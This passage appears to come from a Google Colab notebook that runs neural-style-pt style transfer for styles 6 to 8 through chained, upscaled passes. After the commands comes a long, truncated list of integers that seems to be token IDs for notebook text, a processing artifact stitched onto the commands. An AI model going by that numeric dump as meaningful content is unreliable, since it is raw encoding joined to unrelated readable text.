!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/6A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_6.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_6.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-6.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 7 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/7A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/7A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/7A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/7A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/7A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/7A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_7.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_7.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-7.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 8 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/8A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/8A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/8A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/8A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/8A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/8A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_8.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_8.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-8.png' -tv_weight 0 -original_colors 0 -backend cudnn | [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
8199,
1523,
17738,
23939,
20558,
13,
541,
2047,
65,
198,
198,
38062,
4142,
7560,
416,
1623,
4820,
2870,
13,
198,
198,
20556,
2393,
318,
5140,
379,
198,
220,
220,
220,
3740,
1378,
4033,
397,
13,
34033,
13,
13297,
13,
785,
14,
19472,
14,
16,
2926,
56,
73,
50,
85,
38,
69,
54,
76,
16,
64,
28425,
86,
15,
301,
77,
21,
47,
22,
52,
23,
79,
56,
1929,
36299,
52,
15,
198,
37811,
198,
198,
2,
0,
48005,
535,
1377,
9641,
198,
4798,
7203,
7120,
11362,
318,
257,
366,
8,
198,
0,
77,
21744,
12,
5796,
72,
532,
43,
198,
4798,
7203,
33346,
5972,
82,
4943,
198,
4798,
7203,
45,
21744,
509,
1795,
318,
407,
1576,
284,
466,
1613,
317,
20,
329,
1029,
581,
17311,
290,
317,
22,
329,
1877,
581,
17311,
4943,
198,
4798,
7203,
45,
21744,
350,
3064,
481,
466,
281,
317,
23,
287,
1088,
2242,
2431,
4943,
198,
198,
6738,
26692,
22602,
1330,
7166,
62,
31673,
198,
859,
62,
22296,
796,
7166,
62,
31673,
22446,
23350,
1220,
352,
68,
24,
198,
4798,
10786,
7120,
19124,
468,
46110,
13,
16,
69,
92,
12526,
38346,
286,
1695,
13931,
59,
77,
4458,
18982,
7,
859,
62,
22296,
4008,
198,
198,
361,
15770,
62,
22296,
1279,
1160,
25,
198,
220,
3601,
10786,
3673,
1262,
257,
1029,
12,
24115,
19124,
11537,
198,
17772,
25,
198,
220,
3601,
10786,
1639,
389,
1262,
257,
1029,
12,
24115,
19124,
0,
11537,
198,
198,
6738,
23645,
13,
4033,
397,
1330,
3708,
198,
19472,
13,
14948,
10786,
14,
11299,
14,
70,
19472,
11537,
198,
198,
0,
18300,
17271,
3740,
1378,
12567,
13,
785,
14,
2964,
33648,
23774,
14,
710,
1523,
12,
7635,
12,
457,
13,
18300,
198,
198,
0,
13155,
532,
380,
12813,
11299,
14,
70,
19472,
14,
3666,
9974,
14,
45,
4303,
51,
14,
9122,
13033,
14,
17620,
62,
1050,
46493,
13,
79,
400,
1,
1220,
11299,
14,
710,
1523,
12,
7635,
12,
457,
14,
27530,
14,
198,
0,
13155,
532,
380,
12813,
11299,
14,
70,
19472,
14,
3666,
9974,
14,
45,
4303,
51,
14,
9122,
13033,
14,
35073,
62,
320,
11286,
316,
13,
79,
400,
1,
1220,
11299,
14,
710,
1523,
12,
7635,
12,
457,
14,
27530,
14,
198,
0,
13155,
532,
380,
12813,
11299,
14,
70,
19472,
14,
3666,
9974,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
1,
1220,
11299,
14,
710,
1523,
12,
7635,
12,
457,
14,
27530,
14,
198,
0,
13155,
532,
380,
12813,
11299,
14,
70,
19472,
14,
3666,
9974,
14,
45,
4303,
51,
14,
9122,
13033,
14,
85,
1130,
1433,
12,
405,
65,
2670,
64,
16,
65,
13,
79,
400,
1,
1220,
11299,
14,
710,
1523,
12,
7635,
12,
457,
14,
27530,
14,
198,
0,
13155,
532,
380,
12813,
11299,
14,
70,
19472,
14,
3666,
9974,
14,
45,
4303,
51,
14,
9122,
13033,
14,
85,
1130,
1129,
12,
67,
486,
1765,
22,
21101,
13,
79,
400,
1,
1220,
11299,
14,
710,
1523,
12,
7635,
12,
457,
14,
27530,
14,
198,
198,
0,
79,
541,
2721,
28034,
855,
16,
13,
22,
13,
16,
10,
27399,
8784,
28034,
10178,
855,
15,
13,
23,
13,
17,
10,
27399,
8784,
28034,
24051,
18604,
15,
13,
22,
13,
17,
532,
69,
3740,
1378,
15002,
13,
9078,
13165,
354,
13,
2398,
14,
1929,
75,
14,
13165,
354,
62,
31284,
13,
6494,
198,
198,
2,
45537,
2,
198,
2,
3563,
56,
2538,
352,
1303,
198,
2,
45537,
2,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
16,
6,
532,
7635,
62,
6551,
8576,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
16,
13,
11134,
6,
532,
15003,
4738,
532,
40684,
62,
4873,
352,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
22243,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
16,
32,
16,
13,
11134,
6,
532,
14981,
62,
6551,
657,
13,
2388,
16,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
220,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
16,
6,
532,
7635,
62,
6551,
8576,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
16,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
16,
32,
16,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
46720,
532,
22510,
62,
2676,
602,
10053,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
48466,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
16,
32,
17,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
16,
6,
532,
7635,
62,
6551,
8576,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
16,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
16,
32,
17,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
28119,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
16,
32,
18,
13,
11134,
6,
532,
14981,
62,
6551,
657,
13,
2388,
16,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
16,
6,
532,
7635,
62,
6551,
604,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
16,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
16,
32,
18,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
36641,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
16,
32,
19,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
16,
6,
532,
7635,
62,
6551,
807,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
16,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
16,
32,
19,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
36641,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
17,
62,
17,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
18,
62,
17,
11,
260,
2290,
18,
62,
18,
11,
260,
2290,
18,
62,
19,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
19,
62,
17,
11,
260,
2290,
19,
62,
18,
11,
260,
2290,
19,
62,
19,
11,
260,
2290,
20,
62,
16,
11,
260,
2290,
20,
62,
17,
11,
260,
2290,
20,
62,
18,
11,
260,
2290,
20,
62,
19,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
17,
62,
17,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
18,
62,
17,
11,
260,
2290,
18,
62,
18,
11,
260,
2290,
18,
62,
19,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
19,
62,
17,
11,
260,
2290,
19,
62,
18,
11,
260,
2290,
19,
62,
19,
11,
260,
2290,
20,
62,
16,
11,
260,
2290,
20,
62,
17,
11,
260,
2290,
20,
62,
18,
11,
260,
2290,
20,
62,
19,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
16,
32,
20,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
16,
6,
532,
7635,
62,
6551,
604,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
16,
13,
11134,
6,
532,
11299,
62,
6551,
657,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
16,
32,
20,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
1802,
532,
9060,
62,
7857,
21431,
532,
22510,
62,
2676,
602,
939,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
16,
32,
21,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
16,
6,
532,
7635,
62,
6551,
604,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
16,
13,
11134,
6,
532,
11299,
62,
6551,
1315,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
